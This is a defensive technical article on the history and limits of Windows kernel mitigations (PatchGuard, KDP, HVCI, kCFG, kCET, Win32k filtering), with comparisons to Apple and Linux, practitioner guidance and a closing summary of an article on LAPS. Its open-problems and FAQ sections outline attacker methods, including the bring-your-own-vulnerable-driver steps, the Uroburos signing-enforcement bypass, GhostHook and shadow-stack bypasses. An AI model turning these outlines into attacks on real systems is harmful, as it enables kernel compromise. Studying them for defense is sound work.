The attack pattern in which an attacker, having reached administrator privilege, installs a *legitimate* signed third-party kernel driver known to contain a privilege-escalation vulnerability, then exploits that vulnerability to obtain arbitrary kernel-mode primitives. The Uroburos VBoxDrv abuse [@gdata-uroburos-blog] is the canonical 2011 example; the Microsoft Recommended Driver Block Rules are the 2024+ reactive answer [@ms-driver-block-rules].

Synthesis

By 2026, the Windows kernel self-defense stack is no longer a single mitigation; it is a stack organised by where the defense actually runs. The 21-year trajectory now resolves into a single thesis: every generation has been a partial answer to the same-privilege paradox, and Microsoft's strategy has progressively migrated the defense out of the kernel -- first into instruction-level obfuscation, then into address-space tricks, then into VBS-anchored isolation, and finally into attack-surface deletion. Before we name that thesis formally, it is worth asking: what did the rest of the industry do?

7. What the rest of the industry did differently

The Microsoft answer to the same-privilege paradox -- twenty-one years of compounding investment in same-privilege deterrents while progressively shifting enforcement to VTL1 -- is not the only answer. Apple and the Linux mainline community took architecturally opposite paths, each correct for a different platform constraint.

Apple: push the defense into silicon

Apple's answer was to put enforcement below the kernel, into hardware Apple controls end-to-end. On Apple Silicon, the Kernel Text Read-only Region (KTRR) is hardware-enforced via the AMCC (Apple Memory Cache Controller). At boot, after the kernel is mapped and before user code runs, the kernel text region is locked read-only at the memory-controller level. Once locked, no software running at any privilege level can modify it -- not the kernel itself, not a kernel extension, not a hypothetical EL2 hypervisor [@siguza-ktrr].

Apple Silicon's hardware-enforced read-only kernel text region. After boot, the kernel image is locked via the AMCC memory controller; no software at any privilege level can write to the protected region for the lifetime of that boot [@siguza-ktrr]. Apple's architectural answer to the same-privilege paradox: push the defense *below* the kernel, into hardware Apple controls.

The corollary is that Apple's hardware control allows them to make a software move Microsoft cannot. Apple deprecated third-party Kernel Extensions (KEXTs) in favour of user-mode DriverKit and Endpoint Security, structurally removing the BYOVD class from the platform.Apple's deprecation of third-party KEXTs began in macOS Catalina (2019) with a deprecation warning, escalated to "system extensions" requiring user approval and reduced kernel-mode footprint, and reached a near-complete migration target on Apple Silicon. The architectural cost is that legitimate device-driver vendors and EDR products had to rebuild their stacks on top of user-mode brokers and Apple-curated APIs; the architectural benefit is that a 2024-style CrowdStrike Falcon kernel-driver outage is structurally not possible on Apple Silicon, because the EDR product runs in user mode against an Endpoint Security framework that mediates the kernel for it.

Linux mainline: privilege reduction, not integrity monitoring

The mainline Linux community's strategy is structurally the opposite of Microsoft's: do not invest in same-privilege deterrents at all; invest in privilege reduction and surface isolation instead. LKRG (Linux Kernel Runtime Guard, maintained by Openwall) is the closest functional analogue to PatchGuard [@openwall-lkrg-page] [@openwall-lkrg-github]. Its own documentation describes it as "bypassable by design" -- an openly-acknowledged same-privilege paradox.LKRG's frank framing is unusual in the security tools space. The project explicitly tells operators that LKRG is a hardening layer that raises the engineering cost of common kernel rootkit techniques, not a security boundary, and that a determined kernel-mode attacker can defeat it. This is the same architectural truth Skywing made in 2005 and that Microsoft published in the Servicing Criteria a decade later, stated upfront in a project README.

Beyond LKRG, the mainline mechanisms have a recurring structural shape. Each row of the table below is structurally a privilege-reduction or surface-removal mechanism rather than a same-privilege integrity check.

Linux mechanism	Status (as of June 2026)	What it protects	Windows analogue
Lockdown LSM	Mainline since 5.4 (2019)	Restricts root's ability to modify the running kernel	Driver Signature Enforcement plus HVCI
FG-KASLR	Out-of-tree	Per-function rather than per-image randomisation	No direct analogue; closest is kASLR base randomisation
Clang KCFI (`-fsanitize=kcfi`)	Mainline since 6.1 (Dec 2022)	Forward-edge CFI for the Linux kernel	kCFG
Shadow Call Stack (ARM64)	Mainline since 5.8 (2020)	Backward-edge integrity on ARM64	kCET (on x64 / AMD), SCS on ARM64 Windows
seccomp-bpf	Mainline since 3.5 (2012)	Caller-defined per-syscall filter for any process	`Win32kSystemCallFilter` (system-defined IDs)
eBPF kernel-mode restrictions	Mainline since 5.8 (2020)	Limits unprivileged users from loading eBPF programs that touch kernel state	No direct Windows analogue

The shared design move across all six is structural privilege reduction rather than same-privilege integrity monitoring. seccomp-bpf is particularly instructive as a counterpoint to Win32kSystemCallFilter. The Linux design is caller-defined: any process can register a BPF program that filters its own syscalls. The Windows design is system-defined: a process registers an opaque bitmap of FilterId values whose semantics are decided by the kernel. The two are not interchangeable, but they answer the same architectural question -- "how do you let a process tell the kernel which syscalls it does not want?" -- with the same fundamental move: per-process surface deletion at the syscall boundary.

Hypervisor-anchored alternatives at the application level

The third philosophy applies the "live at a different privilege than the attacker" answer at the application level rather than the kernel level. Bromium / HP Sure Click and Windows Defender Application Guard open every tab or document in its own micro-VM. The hypervisor is the protection boundary; the kernel inside the VM may be fully compromised without affecting the host. This is structurally the same move Microsoft makes with VBS / VTL1, applied one level up the stack.

Three philosophies, one shared admission

Three platforms, three philosophies, one shared admission: every architecture eventually had to admit that a defense at the same privilege as the attacker cannot succeed in principle. Apple put the defense in silicon. Linux invested in surface reduction instead of integrity monitoring. Microsoft built a same-privilege deterrent first, then migrated the load-bearing pieces of it to VTL1. The interesting disagreement is not whether the paradox exists -- it is where, exactly, to put the defense instead. That is a question with no single right answer, and to see why, we have to state the paradox formally.

8. The same-privilege paradox, formally

Now we can state the paradox in a sentence: a defense that shares its CPU privilege level with the attacker can in principle always be subverted by an attacker at that privilege level, because every code path and data structure the defense relies on is, by construction, mutable by the attacker. It is not a formal impossibility theorem in the cryptographic sense -- there is no FLP-style no-go proof for kernel self-defense -- but it is the de facto design constraint Microsoft has acknowledged in writing.

Microsoft's formal admission

The Microsoft Security Servicing Criteria for Windows defines a "security boundary" as "a logical separation between the code and data of security domains with different levels of trust", with kernel-mode versus user-mode as the canonical example [@ms-servicing-criteria]. The document then enumerates which transitions Microsoft treats as security boundaries (kernel / user, hypervisor / kernel, VTL1 / VTL0, virtual machine / host, network), and explicitly does not enumerate admin-to-kernel or kernel-to-kernel as boundaries. The exclusion is the cleanest possible architectural admission of the paradox: no defense at CPL=0 in the attacker's kernel can be a security boundary, no matter how cleverly engineered. PatchGuard, by Microsoft's own classification, is not a boundary and never has been.

Key idea: The same-privilege paradox is, formally, the observation that the reference monitor of a security policy must be tamper-resistant from the principals it monitors, and that "tamper-resistant from a co-resident kernel-mode attacker" is structurally unachievable in a single-address-space single-privilege design. Every modern Windows kernel mitigation either raises the cost of tampering (the engineering-deterrent class: PatchGuard, KASLR, kASLR variants) or moves the monitor outside CPL=0 (the structural class: KDP, kCFG-with-VBS-bitmap, kCET, the entire VTL1-anchored stack). Only the second class can claim a security boundary.

The KASLR-specific bound

The cleanest mathematical version of the paradox lives in the KASLR side-channel literature. Suppose an x64 system has $n$ bits of entropy in its kernel base address; the probabilistic floor on guessing it from one shot is $2^{-n}$. The Hund-Willems-Holz 2013 result is that a co-resident user-mode attacker with access to a shared TLB or cache state can extract bits of the kernel base at a rate of one bit per probe, recovering the address in $O(n)$ probes -- a polynomial-time defeat of the probabilistic defense [@doi-hund-2013]. Increasing $n$ does not change the asymptotic; it only changes the constant. Gruss et al. 2017 generalised the argument across micro-architectural side channels and concluded that any operating system implementing user / kernel address-space sharing on a CPU with shared TLB / cache state must leak the kernel base address to an unprivileged user-mode timing observer [@gruss-kaiser-pdf]. The structural fix is not to add entropy: it is to remove the sharing. KVA Shadow / KPTI is the structural answer.

The shape of the bound is general. Wherever a defense's correctness reduces to the attacker not knowing X, and X leaks across a shared micro-architectural channel, the defense is asymptotically defeated.

The proper formal anchor: Anderson 1972

The right formal anchor for the same-privilege paradox is the reference-monitor concept introduced in Anderson's 1972 Computer Security Technology Planning Study for the US Air Force [@csrc-anderson-1972]. Anderson's "reference monitor" must satisfy three properties:

Always invoked. Every reference of a subject to an object is mediated.
Tamper-resistant. The reference monitor cannot be modified by the subjects it monitors.
Small enough to be analysed. The Trusted Computing Base (TCB) is small enough to be verified.

PatchGuard fails property 2 by construction: it lives in the same address space as the subjects it monitors, and any subject with kernel-mode write can modify the verifier code, the verifier schedule, the expected-hash store, or the bug-check primitive. KDP, by contrast, satisfies property 2 because its enforcement lives in VTL1 and a VTL0 subject cannot reach VTL1.

A recurring confusion in the kernel-security literature is to anchor same-privilege-paradox arguments in the Bell-LaPadula or Biba multi-level security models (1973 / 1977). Those models formalise *information flow* across security domains -- which subjects may read or write which objects given their lattice levels. They are silent on the question of whether the policy *enforcement mechanism itself* can be tamper-resistant against a co-resident attacker. That is Anderson's reference-monitor property, formalised in the 1972 USAF report [@csrc-anderson-1972]. Bell-LaPadula assumes a tamper-resistant reference monitor as a precondition; Anderson's report is the document that *names* the precondition. For the same-privilege paradox, Anderson is the load-bearing anchor.

The existence proof for what a minimal verifiable TCB looks like is seL4 (Klein et al., SOSP 2009): a roughly 8,700-line microkernel formally verified down to its C implementation against a high-level specification of access control. seL4 is the constructive counterpoint to the Microsoft-style mitigation stack: instead of adding integrity monitors to a large kernel, build a small kernel small enough to verify and put everything else in user-space servers. Windows' VBS / VTL1 architecture is a partial gesture in the same direction -- the Secure Kernel is far smaller than the NT kernel and hosts only policy-enforcement trustlets -- but it is not a from-scratch redesign.

Upper and lower bounds, mitigation by mitigation

The 21-year story now lays out cleanly as a table of bounds.

Mitigation	Upper bound achieved	Lower bound that remains	Structural reason
PatchGuard	Engineering-deterrent class; raises cost of casual kernel hooking	Zero structural lower bound; same-privilege bypass class always exists [@uninformed-v3-archive] [@cyberark-ghosthook]	Verifier lives at attacker's privilege
KASLR (entropy alone)	Probabilistic floor against blind-guess attacker	Zero structural lower bound against side-channel attacker [@doi-hund-2013]	TLB / cache shared between user and kernel
KVA Shadow / KPTI	Structural Meltdown fix (Variant 3)	Spectre Variants 1, 2, 4 require separate mitigations [@usenix-lipp-meltdown]	Address-space split addresses only the user-to-kernel transient read
HVCI	Structural W^X for kernel pages, enforced by VTL1	VBS-coverage gap on systems that cannot run VBS [@ms-kdp-blog]	Hypervisor is the protection boundary
KDP (static and dynamic)	Structural read-only-after-init for explicitly-tagged kernel data	Protects only what is explicitly opted in [@ms-kdp-blog]	VTL1 enforces SLAT page tables outside VTL0 reach
kCFG (with HVCI)	Structural forward-edge CFI; bitmap in VTL1-protected memory	Backward edge unprotected; same-call-target overwrite via type confusion possible without XFG [@ms-cfg]	Bitmap stored outside VTL0
kCET	Structural backward-edge CFI in CPU hardware	Off-by-default on Server 2025; gated on driver `/CETCOMPAT` [@ms-kernel-mode-hsp] [@mcgarr-bh25-blackhat]	Shadow stack hardware enforced in silicon
Win32kSystemCallFilter	Structural surface deletion for sandboxed renderers	Full lockdown not viable for UI-bearing processes [@ms-syscall-filter-policy]	Per-process bitmap consulted by syscall dispatcher

The gap between the same-privilege upper bound (PatchGuard, KASLR-alone -- structurally zero) and the cross-privilege upper bound (HVCI, KDP, kCET -- structurally meaningful) is exactly the gap Microsoft has spent twenty-one years migrating across. With the paradox stated formally, the rest of the article is a single question: where in the privilege hierarchy does the next problem live, and how is Microsoft positioned to answer it?

9. Open problems on the June 2026 frontier

The same-privilege paradox is in 2026 closer to architecturally resolved than at any prior point in Windows history -- the VTL1-anchored stack of HVCI / KDP / kCFG / kCET makes the cross-privilege answer real. But every structural mitigation has a practical residual, and five of them are large enough to be the article's frontier.

BYOVD: the dominant 2026 attacker path

Bring-Your-Own-Vulnerable-Driver is the dominant practical defeat of every structural mitigation in the 2026 stack. Uroburos's 2011 pattern is essentially what current attackers do: locate a signed third-party driver with a kernel-write primitive (an IOCTL that allows arbitrary physical memory read or write, or arbitrary MSR manipulation), install it through a legitimate driver-load path, exploit the primitive to obtain arbitrary kernel write, then flip the policy flags or hook the structures Microsoft thought were protected. Elastic Security Labs' 2024 survey of in-the-wild Windows kernel LPE 0-days confirms that BYOVD remains a recurring subsystem of incidents [@elastic-lpe-survey], and the Project Zero "0day In the Wild" tracker continues to record Windows kernel-mode CVEs across DWM, win32k, and ALPC subsystems [@pz-0days-tracker]. Every structural mitigation collapses the moment an attacker reaches arbitrary kernel write through a legitimately-loaded driver: KDP-protected pages can be ignored if the attacker can install a new driver that simply does not allocate from the secure pool; kCFG can be bypassed by writing to memory that was not opted in; kCET can be bypassed via McGarr-style iretq corruption [@mcgarr-km-shadow]; PatchGuard can be hooked from a coexisting driver.

The Microsoft Recommended Driver Block List [@ms-driver-block-rules] is the reactive answer. The structural problem -- that signed third-party drivers with kernel-write primitives exist at all, and that the third-party driver supply chain cannot be removed for compatibility reasons -- is unresolved.

Note: A defender architecting around the 2026 Windows kernel mitigation stack must assume BYOVD as the dominant practical bypass. The structural mitigations -- KDP, kCFG, kCET, HVCI -- are sound against an attacker who is constrained to operate within the inbox kernel. They are not sound against an attacker who can load any of the recurring vulnerable signed drivers the Microsoft Recommended Driver Block List exists to catalogue [@ms-driver-block-rules] [@elastic-lpe-survey]. Verify that the block list is enforced (CiTool --list-policies), watch CodeIntegrity Event ID 3099, and treat BYOVD as the threat model that drives mitigation selection.

The VBS coverage gap

Every VTL1-anchored mitigation collapses on systems that cannot run VBS. Older silicon (pre-2015 Intel without VT-x / VT-d / EPT, AMD parts predating AMD-V / NPT), enterprise-imaged corporate fleets that disabled VBS for compatibility, ARM64 devices below a baseline, and any system without UEFI Secure Boot all fall back to the same-privilege defenses we just classified as structurally bounded. The defender's threat model is the worst case in the fleet, not the average case in the Microsoft launch announcement.

Win32k Lockdown coverage in UI-bearing processes

Office, browsers' GPU and UI processes, and any application that draws windows cannot use the full Win32kSystemCallFilter lockdown. Their allow-lists must cover composition, font rendering, and a substantial fraction of the GDI surface -- which is exactly the surface from which historical LPE bugs emerged. The 2016 win32kbase.sys / win32kfull.sys typeisolation refactor (Windows 10 v1607, build 14393) split win32k.sys to make the surface more attributable, but per-app auto-tuning of the allow-list from observed-call traces remains an open product-engineering problem [@j00ru-syscalls-table]. Until UI-bearing processes can use a tight allow-list rather than a permissive one, the win32k surface remains the systemic LPE foothold Bochspwn identified in 2013 [@j00ru-bochspwn-blog].

Hypervisor escapes as the structural counter

Every VTL1-anchored mitigation assumes VTL1 is uncompromised. Hyper-V CVEs show that the hypervisor TCB hosts its own vulnerability surface. CVE-2024-38080 (Hyper-V SLAT vulnerability) is a 2024 example with Akamai write-up [@akamai-hyperv-cve]. Joanna Rutkowska's 2006 Blue Pill demonstration at Black Hat USA, Subverting Vista Kernel for Fun and Profit, was the seminal academic primary for the hypervisor-rootkit class and remains the canonical "Hyperjacking" reference [@blackhat-rutkowska-bluepill]. Every step the Windows mitigation stack takes toward putting more enforcement in VTL1 raises the criticality of VTL1's own correctness. The Hyper-V code base is small relative to ntoskrnl but is not zero, and the post-2018 trend of finding side-channel and architectural bugs in CPU hardware applies to VTL1 as much as it does to VTL0.

kCET deployment completion

kCET is shipping but off-by-default on Windows Server 2025, gated on driver /CETCOMPAT compatibility [@ms-kernel-mode-hsp]. Until kCET is on-by-default across the inbox kernel and all loaded drivers, the backward-edge ROP class against the Windows kernel remains exploitable in practice. McGarr's 2025 Black Hat USA deck documents both the structural-bypass frontier and the operational gating problem [@mcgarr-bh25-blackhat] [@mcgarr-github] [@mcgarr-km-shadow].

On July 19, 2024, a faulty kernel-mode signature update from CrowdStrike Falcon triggered a Windows page fault in a CrowdStrike driver, crashing an estimated 8.5 million Windows endpoints worldwide and disrupting airline operations, hospital systems, payment processing, and emergency-services dispatch for hours to days. The post-incident discussion produced one architectural takeaway widely shared across the kernel-security community: a single signed third-party kernel driver, even one shipped by a defender, can take the operating system down -- and there is no in-kernel protection against it that does not also break legitimate EDR vendors. Microsoft's 2006 position that the right answer is "as few third-party kernel drivers as possible, with as much functionality as possible mediated by user-mode brokers" got eighteen years of pushback before being retroactively vindicated. The 2024-2026 product direction -- Microsoft's announcement of the Windows Endpoint Security Platform, a user-mode EDR API that lets vendors build without kernel drivers -- is the inheritor of that position.

Historical anchoring: the win32k LPE share

The "win32k killed half of LPE" framing in the article's subtitle deserves time-scoping. Pre-lockdown, win32k was the dominant Windows kernel LPE subsystem -- Stuxnet 2010 (CVE-2010-2743) is the historical anchor [@nvd-cve-2010-2743], Bochspwn 2013 documented the systemic shape [@j00ru-bochspwn-blog] [@j00ru-bhusa-pdf], Forshaw 2016 reports that the Chrome M54 lockdown "blocked the sandbox escape of an exploit chain being used in the wild" [@pz-breaking-chain], and Elastic Security Labs' 2024 in-the-wild survey continues to name win32k among the recurring subsystems [@elastic-lpe-survey]. The Project Zero 0day tracker also confirms that win32k remains in the post-lockdown attacker mix [@pz-0days-tracker]. The lockdown removed roughly half the historically-vulnerable syscall surface from sandboxed renderers specifically; both the fraction and the scope are time- and context-bounded, and a precise percentage cannot be cited to the Project Zero tracker because the tracker does not publish per-subsystem aggregates.

flowchart TD subgraph SD["Surface deletion (kernel system-call boundary)"] SDF["Win32kSystemCallFilter per-process bitmap"] SDD["DisallowWin32kSystemCalls all-or-nothing"] end subgraph V1["VTL1 (Secure Kernel anchored)"] V1H["HVCI (W^X SLAT for kernel pages)"] V1K["KDP static and dynamic via SLAT RO"] V1C["kCFG bitmap in VTL1-protected memory"] end subgraph CPU["CPU mediated (hardware enforced)"] CPUS["kCET shadow stack on Intel CET / AMD"] CPUK["KVA Shadow CR3 switch"] end subgraph V0["VTL0 same-privilege (CPL=0)"] V0P["PatchGuard integrity checks"] V0K["KASLR base-address randomisation"] end SD --> V1 V1 --> CPU CPU --> V0

BYOVD is in 2026 what same-privilege bypass was in 2007 -- the dominant practical defeat of a mitigation stack whose individual pieces are each structurally sound. The next twenty-one years of Windows kernel self-defense will be substantially the story of what Microsoft does about it.

10. What a Windows defender or driver developer actually does today

The article's intellectual payoff has been made; the practical payoff is the rest of this section. Five concrete decision questions, in roughly the order a working practitioner would reason through them.

1. Is the system Secured-core or Windows 11 22H2+ with Memory Integrity on?

If yes, HVCI, KDP, kCFG, and the Microsoft Recommended Driver Block Rules are baseline [@ms-kdp-blog] [@ms-driver-block-rules]. Layer kCET if all loaded drivers are /CETCOMPAT and the CPU is Intel 11th-gen Tiger Lake or later or AMD Zen 3 or later [@ms-kernel-mode-hsp]. The baseline gets you the structural mitigations the same-privilege paradox argues are required; everything else is layered on top.

2. Is the workload a sandboxed renderer or sandboxable child process?

Apply Win32kSystemCallFilter (Windows 10 1709+) via UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...) at CreateProcess time, not at runtime [@ms-syscall-filter-policy]. The Forshaw / Fratric race-the-mitigation Edge demonstration is the empirical reason -- if the filter is applied after the child process has started, an attacker who races the policy application can simply not be filtered [@pz-breaking-chain]. The Chromium sandbox is the canonical consumer reference for what this composition looks like in a production browser [@chromium-sandbox-doc].

Note: Every per-process mitigation in modern Windows -- Win32kSystemCallFilter, DisallowWin32kSystemCalls, ACG, CIG, Strict CIG, user-mode shadow stack, CFG -- belongs on the CreateProcess boundary. The Forshaw / Fratric Project Zero finding on Edge's window-broker race [@pz-breaking-chain] is the empirical proof that mitigations applied to a running process leave a race window. The Windows API path is STARTUPINFOEXW with a PPROC_THREAD_ATTRIBUTE_LIST containing PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY; the policy enums to set are documented in ntddk.h for the filter [@ms-syscall-filter-policy] and in winnt.h for the disable [@ms-syscall-disable-policy].

3. Is the workload UI-bearing?

Full lockdown is out of reach for processes that draw windows, render fonts, or dispatch input. The practical answer is the adjacent mitigation set: Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), Strict CIG, user-mode shadow stack, and CFG, plus PatchGuard, HVCI, and kCFG at the system level. The composition raises the cost of remote exploitation without requiring the renderer-style syscall-surface deletion.

For a sandboxed renderer-class process on Windows 11 22H2+:

Win32kSystemCallFilter -- PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY with the bitmap permitting only the FilterId values the renderer needs [@ms-syscall-filter-policy].
ACG (Arbitrary Code Guard) -- forbid dynamic code generation in the process.
CIG / Strict CIG (Code Integrity Guard) -- forbid loading non-Microsoft-signed DLLs (CIG), or non-Microsoft-signed-and-not-store-signed DLLs (Strict CIG).
User-mode shadow stack and CFG -- backward and forward edge CFI in user mode.

All four are applied via UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...) at CreateProcess time, in the same call. The Chromium renderer is the canonical reference deployment [@chromium-sandbox-doc].

4. Are you a driver author?

Three things to do, in order:

Mark RO-after-init data via Static KDP. Call MmProtectDriverSection from DriverEntry on any image section that should be read-only for the rest of the driver's lifetime [@ms-kdp-blog].
Allocate runtime-protected state via Dynamic KDP. Call ExAllocatePool3 with a POOL_EXTENDED_PARAMETER array containing a POOL_EXTENDED_PARAMS_SECURE_POOL extended parameter. Set SECURE_POOL_FLAGS_FREEABLE if the allocation needs to be freeable; set SECURE_POOL_FLAG_MODIFIABLE only if the allocation must be modifiable under further protected control [@ms-kdp-blog].
Compile with /guard:cf and /CETCOMPAT. The first enables CFG instrumentation across the driver image; the second tells the loader the driver is compatible with kernel-mode shadow stack [@ms-cfg] [@ms-kernel-mode-hsp].

The driver-side KDP pattern is short enough to show in full:

// DriverEntry-time static KDP: mark a .rdata-like section as read-only
NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject,
                     _In_ PUNICODE_STRING RegistryPath) {
    NTSTATUS status = MmProtectDriverSection(
        &g_PolicyTable,        // address of the section to protect
        sizeof(g_PolicyTable), // size in bytes
        0);                    // reserved
    if (!NT_SUCCESS(status)) return status;
    // ... rest of driver init
    return STATUS_SUCCESS;
}

// Runtime dynamic KDP allocation: a secure pool buffer
POOL_EXTENDED_PARAMETER params[2] = {0};
params[0].Type = PoolExtendedParameterSecurePool;
params[0].SecurePoolParams = &(POOL_EXTENDED_PARAMS_SECURE_POOL){
    .SecurePoolFlags = SECURE_POOL_FLAGS_FREEABLE,
    .SecurePoolBuffer = NULL,
    .Cookie = 0xC0FFEEDEADBEEFULL,
    .NoFill = FALSE,
};
params[1].Type = PoolExtendedParameterInvalidType;

PVOID secureBuffer = ExAllocatePool3(
    POOL_FLAG_NON_PAGED,    // pool flags
    bufferSize,             // size
    'KDPx',                 // pool tag
    params,                 // extended parameters
    1);                     // count of extended parameters

5. Are you a defender on an existing fleet?

Verify that the Recommended Driver Block Rules are active via CiTool --list-policies. Look for a policy whose Friendly Name is Microsoft Windows Driver Policy and Is Currently Enforced is true [@ms-driver-block-rules]. Watch Event ID 3099 in the CodeIntegrity Operational log for block events. For verifying the broader VBS / HVCI state, the canonical PowerShell query is Get-CimInstance Win32_DeviceGuard followed by selecting VirtualizationBasedSecurityStatus, SecurityServicesRunning, and AvailableSecurityProperties. For KVA Shadow specifically, Get-SpeculationControlSettings reports the state. For per-process mitigation policy, Get-ProcessMitigation -System for the system policy and Get-ProcessMitigation -Name <name> for a specific process; the Chromium internal page chrome://sandbox shows the per-process filter state from inside the browser.

A reader who wants to play with the field-decoding logic can do it in a browser. The Python below mirrors what the PowerShell pipeline does -- enumerate the bits, decode by name. The real Windows API surface is bigger, but the decoding shape is the same.

Conceptual decoder for Win32_DeviceGuard fields Real PowerShell: Get-CimInstance Win32_DeviceGuard | Select VirtualizationBasedSecurityStatus, SecurityServicesRunning, AvailableSecurityProperties

VBS_STATUS = { 0: "VBS not enabled", 1: "VBS enabled but not running", 2: "VBS enabled and running", }

SECURITY_SERVICES = { 0: "None", 1: "Credential Guard", 2: "HVCI", 3: "System Guard Secure Launch", 4: "SMM Firmware Measurement", 7: "Kernel Mode Hardware-enforced Stack Protection (kCET)", 8: "Hypervisor-Protected Code Integrity (HVCI legacy)", }

AVAILABLE_PROPERTIES = { 1: "Base virtualization support", 2: "Secure boot", 3: "DMA protection", 4: "Secure memory overwrite", 5: "UEFI code readonly", 6: "SMM security mitigations", 7: "Mode-based execute control for HVCI", 8: "APIC virtualization", }

def decode(field_name, value, table): if isinstance(value, list): names = [table.get(v, f"unknown({v})") for v in value] print(f" {field_name}: {names}") else: print(f" {field_name}: {table.get(value, f'unknown({value})')}")

Simulated CIM response from a Secured-core PC

sample = { "VirtualizationBasedSecurityStatus": 2, "SecurityServicesRunning": [1, 2, 7], "AvailableSecurityProperties": [1, 2, 3, 5, 7], }

print("Win32_DeviceGuard decoded:") decode("VirtualizationBasedSecurityStatus", sample["VirtualizationBasedSecurityStatus"], VBS_STATUS) decode("SecurityServicesRunning", sample["SecurityServicesRunning"], SECURITY_SERVICES) decode("AvailableSecurityProperties", sample["AvailableSecurityProperties"], AVAILABLE_PROPERTIES) `}

Common pitfalls

A short reference list of mistakes that recur in real-world reviews:

Apply mitigations at CreateProcess, not at runtime. The Forshaw / Fratric race is the cited example [@pz-breaking-chain].
Do not assume DisallowWin32kSystemCalls is the modern lockdown. It is the Windows 8 ancestor of Win32kSystemCallFilter and is structurally distinct -- different mitigation enum, different policy struct [@ms-syscall-disable-policy] [@ms-syscall-filter-policy].
Do not use MmAllocateNodePagesForMdlEx for Dynamic KDP. The canonical API is ExAllocatePool3 with the secure-pool extended parameter; the NUMA-MDL API is a different API for a different purpose [@ms-kdp-blog].
kCET disables system-wide on a non-/CETCOMPAT driver. A single non-compat driver in the inbox set turns it off [@ms-kernel-mode-hsp].
PatchGuard is not a security boundary. Do not architect a defense whose security argument rests on it; Microsoft's own Servicing Criteria say so [@ms-servicing-criteria].

None of these decisions makes the kernel a security boundary; together they make the kernel as hard to defeat as today's stack allows. The remaining questions are FAQs.

11. Frequently asked questions

No. Microsoft's own *Security Servicing Criteria for Windows* explicitly does not enumerate admin-to-kernel or kernel-to-kernel as a security boundary; PatchGuard is an *engineering deterrent*, not a security boundary [@ms-servicing-criteria]. The most empirically grounded refutation is Uroburos's 2011 -- 2014 operational coexistence with PatchGuard on production Windows systems [@gdata-uroburos-blog]. PatchGuard raises the cost of a class of attacks; it does not eliminate any class of attacks. No. PatchGuard shipped on April 25, 2005, with Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition [@ms-advisory-932596]. Vista x64 (November 2006) inherited PatchGuard v2 from the 2005 release; the x86 editions of Vista never received PatchGuard. The "Vista first" misreading conflates PatchGuard's first widely-publicised release with its first shipping release. No. Uroburos was a Driver Signature Enforcement (DSE) bypass that coexisted with PatchGuard for three years (2011 -- 2014) without modifying any PatchGuard-protected structure. It loaded a signed-but-vulnerable copy of Oracle's `VBoxDrv.sys`, used the vulnerability to flip the `g_CiEnabled` DSE-gating flag, loaded its own unsigned rootkit driver, then operated alongside PatchGuard [@gdata-uroburos-blog] [@stmxcsr-turla]. The canonical PatchGuard *bypass* is GhostHook (Kasif Dekel, CyberArk, June 2017), which uses an Intel-PT-buffer-fill PMI to redirect execution without touching any structure PatchGuard enumerates [@cyberark-ghosthook]. No. They are distinct `SetProcessMitigationPolicy` enums with distinct semantics. `DisallowWin32kSystemCalls` shipped in Windows 8 (2012) as a `PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY` and is all-or-nothing [@ms-syscall-disable-policy]. `Win32kSystemCallFilter` shipped in Windows 10 1709 (October 2017) as a `PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY` and is a per-syscall allow-list driven by a bitmap of system-defined `FilterId` values [@ms-syscall-filter-policy]. Chromium uses *both* in different process types -- the blanket-disable for processes that need no UI, the per-syscall filter for the renderer [@chromium-sandbox-doc]. Microsoft's documentation still calls it an x64 feature [@ms-driver-x64-restrictions], but in deployment it is also enforced on 64-bit ARM Windows in 2026. It has never shipped on x86 -- the precise framing is "64-bit Windows only, both x64 and ARM64." The "x64 only" framing is documentation-accurate but deployment-incomplete. Mostly no. KDP is a VBS-backed (Secure Kernel / VTL1) mitigation that *protects* kernel memory but is *enforced* outside the kernel. The Microsoft launch blog states the architecture directly: "the memory managed by KDP is always verified by the secure kernel (VTL1) and protected using SLAT tables by the hypervisor" [@ms-kdp-blog]. KDP is the canonical example of the same-privilege paradox resolved by structural means: the enforcement lives at a privilege level the VTL0 attacker cannot reach. Title hyperbole, time-scoped. Pre-lockdown, win32k was the dominant Windows kernel LPE subsystem -- Stuxnet 2010 used a `win32k.sys` keyboard-layout LPE [@nvd-cve-2010-2743]; Bochspwn 2013 documented the systemic shape [@j00ru-bochspwn-blog]; Forshaw reports that Chrome's M54 win32k lockdown "blocked the sandbox escape of an exploit chain being used in the wild" [@pz-breaking-chain]. Elastic Security Labs' 2024 in-the-wild survey continues to name win32k among the recurring subsystems [@elastic-lpe-survey]. The lockdown removed roughly half the historically-vulnerable syscall surface *from sandboxed renderers specifically* -- both the fraction and the scope are time- and context-bounded.

Key idea: PatchGuard, KASLR, KDP, Win32kSystemCallFilter -- four answers, twenty-one years, one paradox. The arc resolves: every meaningful kernel defense in modern Windows ultimately lives at a privilege level the attacker does not have, because the alternative -- defending the kernel from inside the kernel -- is the one thing the architecture cannot do.

The Twenty-Year Local Admin Password Crisis: From GPP cpassword to Windows LAPS

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

**Eleven years separated Microsoft's December 2012 architectural articulation of the shared-local-admin problem from the April 11, 2023 in-box default.** Group Policy Preferences "encrypted" the local Administrator password with an AES key Microsoft published in its own protocol specification (2008-2014). MS14-025 disabled new authoring but deleted no SYSVOL artefacts (2014). Legacy LAPS shipped as a separate MSI with plaintext in `ms-Mcs-AdmPwd` (2015-2023). In-box Windows LAPS finally added CNG DPAPI encryption-at-rest, Microsoft Entra ID backup, and post-authentication rotation. The 2026 default is `BackupDirectory = 2` (AD) or `1` (Entra), `PasswordAgeDays` \<= 30, `ADPasswordEncryptionEnabled` left at its default `True` (the failure mode is silent fallback to plaintext when the domain functional level is below Windows Server 2016, not an off-by-default bit), `ADPasswordEncryptionPrincipal` overridden to a dedicated decryptor group, and `PostAuthenticationActions` left at default `3` (reset + sign out). The residual attack surface is delegated-decryptor compromise, the screenshotted-password OPSEC tail, unmanaged BYOD endpoints, and the multi-decade tail of un-cleaned SYSVOL `cpassword` XMLs that MS14-025 never deleted.

